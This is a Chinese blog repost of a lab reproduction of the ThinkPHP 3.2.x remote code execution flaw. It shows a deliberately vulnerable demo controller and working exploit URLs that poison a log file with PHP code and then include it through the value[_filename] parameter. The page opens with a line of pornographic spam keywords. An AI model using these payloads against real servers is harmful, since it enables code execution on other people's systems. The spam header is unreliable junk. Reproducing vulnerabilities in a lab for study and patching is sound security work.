国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)

這篇具有很好參考價(jià)值的文章主要介紹了ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)

漏洞介紹

ThinkPHP3.2遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞產(chǎn)生原因是由于在業(yè)務(wù)代碼中如果對(duì)模板賦值方法assign的第一個(gè)參數(shù)可控,則導(dǎo)致模板路徑變量被覆蓋為攜帶攻擊代碼路徑,造成文件包含,代碼執(zhí)行等危害。

漏洞復(fù)現(xiàn)

復(fù)現(xiàn)環(huán)境:phpstudy+php7.3.4+ThinkPHP3.2.3完整版+windows10
一、 搭建環(huán)境:
在ThinkPHP的Application\Home\Controller\IndexController.class.php
目錄下寫入模板賦值assign的 Demo
Demo:

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($value=''){
        $this->assign($value);
        $this->display();
    }
}

ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)
寫入demo后需要在view下創(chuàng)建一個(gè)index文件進(jìn)行視圖渲染
目錄:\Application\Home\View\Index\index.html

Log記錄目錄:
若開(kāi)啟debug模式日志會(huì)到:\Application\Runtime\Logs\Home\下
若未開(kāi)啟debug模式日志會(huì)到:\Application\Runtime\Logs\Common\下

二、 漏洞利用
1、創(chuàng)建log文件

http://127.0.0.1/thinkphp/index.php?m=--><?=phpinfo();?>

ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)
2、包含log文件

http://127.0.0.1/thinkphp/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/common/21_07_12.log

ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)

3、上傳具有惡意代碼的任何文件到服務(wù)器上,直接包含其文件相對(duì)或絕對(duì)路徑即可。
例如:http://127.0.0.1/thinkphp/index.php?m=Home&c=Index&a=index&value[_filename]=./[filename]

參考鏈接

https://mp.weixin.qq.com/s/_4IZe-aZ_3O2PmdQrVbpdQ文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-405155.html

到了這里,關(guān)于ThinkPHP 3.2.x RCE漏洞復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    ThinkPHP5.0.0~5.0.23RCE 漏洞分析及挖掘思路

    前言 本節(jié)我將分析thinkphp5.0.x 版本的RCE漏洞,根據(jù)漏洞的研究模擬挖掘此漏洞的思路 本次分析框架下載,由于官方已經(jīng)下架了相關(guān)的下載接口,這里我們用三方下載 一份v5.0.22版本的 升級(jí)中... https://www.codejie.net/5828.html 附贈(zèng)?thinkphp5.0官方開(kāi)發(fā)手冊(cè) 架構(gòu)總覽 · ThinkPHP5.0完全開(kāi)

    2024年01月18日
    瀏覽(30)
  • Apache ActiveMQ RCE漏洞復(fù)現(xiàn)

    Apache ActiveMQ RCE漏洞復(fù)現(xiàn)

    1、 產(chǎn)品簡(jiǎn)介 ActiveMQ是一種開(kāi)源的基于JMS(Java Message Servie)規(guī)范的一種消息中間件的實(shí)現(xiàn),ActiveMQ的設(shè)計(jì)目標(biāo)是提供標(biāo)準(zhǔn)的,面向消息的,能夠跨越多語(yǔ)言和多系統(tǒng)的應(yīng)用集成消息通信中間件。ActiveMQ是Apache出品,最流行的,能力強(qiáng)勁的開(kāi)源消息總線。 2、 漏洞概述 Apache Act

    2024年01月22日
    瀏覽(22)
  • 漏洞復(fù)現(xiàn)-docker-unauthorized-rce

    漏洞復(fù)現(xiàn)-docker-unauthorized-rce

    目錄 一、漏洞介紹 1.1漏洞成因 2.2環(huán)境準(zhǔn)備 二、漏洞檢測(cè) 三、漏洞利用 1.腳本利用 2.定時(shí)任務(wù)反彈shell 3. 寫ssh公鑰獲取shell 1.1漏洞成因 ? ? ? ? docker remote API未授權(quán)訪問(wèn)漏洞,此API主要目的是取代命令執(zhí)行頁(yè)面,開(kāi)放2375監(jiān)聽(tīng)容器時(shí),會(huì)調(diào)用這個(gè)API。方便docker集群管理和擴(kuò)展

    2024年02月09日
    瀏覽(35)
  • Hessian 反序列化RCE漏洞復(fù)現(xiàn)

    Hessian 反序列化RCE漏洞復(fù)現(xiàn)

    ? ? ?Hessian是二進(jìn)制的web service協(xié)議,官方對(duì)Java、Flash/Flex、Python、C++、.NET C#等多種語(yǔ)言都進(jìn)行了實(shí)現(xiàn)。Hessian和Axis、XFire都能實(shí)現(xiàn)web service方式的遠(yuǎn)程方法調(diào)用,區(qū)別是Hessian是二進(jìn)制協(xié)議,Axis、XFire則是SOAP協(xié)議,所以從性能上說(shuō)Hessian遠(yuǎn)優(yōu)于后兩者,并且Hessian的JAVA使用方法非

    2024年02月11日
    瀏覽(34)
  • 銳捷EWEB網(wǎng)管系統(tǒng) RCE漏洞復(fù)現(xiàn)

    銳捷EWEB網(wǎng)管系統(tǒng) RCE漏洞復(fù)現(xiàn)

    ? 銳捷網(wǎng)管系統(tǒng)是由北京銳捷數(shù)據(jù)時(shí)代科技有限公司開(kāi)發(fā)的新一代基于云的網(wǎng)絡(luò)管理軟件,以“數(shù)據(jù)時(shí)代創(chuàng)新網(wǎng)管與信息安全”為口號(hào),定位于終端安全、IT運(yùn)營(yíng)及企業(yè)服務(wù)化管理統(tǒng)一解決方案。 ? Ruijie-EWEB 網(wǎng)管系統(tǒng) flwo.control.php 中的 type 參數(shù)存在命令執(zhí)行漏洞,攻擊者可利

    2024年02月03日
    瀏覽(22)
  • 【安全漏洞】ThinkPHP 3.2.3 漏洞復(fù)現(xiàn)

    在 HomeControllerIndexController 下的index中傳入了一個(gè)可控參數(shù),跟進(jìn)調(diào)試看一下。 跟進(jìn) display() 一路跟進(jìn)到 fetch() ,然后一路進(jìn)入 Hook::listen(\\\'view_parse\\\', $params); 關(guān)鍵地方在這,我們之前 index 里的內(nèi)容被存入了緩存文件php文件中,連帶著我們輸入的可控的php代碼也在其中,然后包

    2024年02月12日
    瀏覽(22)
  • CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    CVE -2022-26134漏洞復(fù)現(xiàn)(Confluence OGNL 注入rce漏洞)

    0x01 Atlassian Confluence Atlassian Confluence是一個(gè)專業(yè)的企業(yè)知識(shí)管理與協(xié)同軟件,主要用于公司內(nèi)員工創(chuàng)建知識(shí)庫(kù)并建立知識(shí)管理流程,也可以用于構(gòu)建企業(yè)wiki。其使用簡(jiǎn)單,但它強(qiáng)大的編輯和站點(diǎn)管理特征能夠幫助團(tuán)隊(duì)成員之間共享信息、文檔協(xié)作、集體討論,信息推送。因此

    2024年02月16日
    瀏覽(19)
  • 【漏洞復(fù)現(xiàn)】Fastjson_1.2.47_rce

    【漏洞復(fù)現(xiàn)】Fastjson_1.2.47_rce

    感謝互聯(lián)網(wǎng)提供分享知識(shí)與智慧,在法治的社會(huì)里,請(qǐng)遵守有關(guān)法律法規(guī) 說(shuō)明 內(nèi)容 漏洞編號(hào) 漏洞名稱 Fastjson_1.2.47_遠(yuǎn)程執(zhí)行漏洞 漏洞評(píng)級(jí) 影響范圍 漏洞描述 修復(fù)方案 1.1、漏洞描述 Fastjson是阿里巴巴公司開(kāi)源的一款json解析器,其性能優(yōu)越,被廣泛應(yīng)用于各大廠商的Java項(xiàng)目

    2024年02月05日
    瀏覽(18)
  • CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一個(gè)基礎(chǔ)開(kāi)源框架,其目的是用于簡(jiǎn)化 Java 企業(yè)級(jí)應(yīng)用的開(kāi)發(fā)難度和開(kāi)發(fā)周期,2022年3月31日,VMware Tanzu發(fā)布漏洞報(bào)告,Spring Framework存在遠(yuǎn)程代碼執(zhí)行漏洞,在 JDK 9+ 上運(yùn)行的 Spring MVC 或 Spring WebFlux 應(yīng)用程序可能容易受到通過(guò)數(shù)據(jù)綁定的遠(yuǎn)程代碼執(zhí)行

    2023年04月21日
    瀏覽(26)
  • IP-guard WebServer RCE漏洞復(fù)現(xiàn)

    ? ?IP-guard是由溢信科技股份有限公司開(kāi)發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡(jiǎn)化IT系統(tǒng)管理。 ?漏洞成因 ? ? 在Web應(yīng)用程序的實(shí)現(xiàn)中,參數(shù)的處理和驗(yàn)證是確保應(yīng)用安全的關(guān)鍵環(huán)節(jié)。然而,當(dāng)參數(shù)處理不當(dāng)時(shí),就會(huì)出現(xiàn)安

    2024年02月05日
    瀏覽(22)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包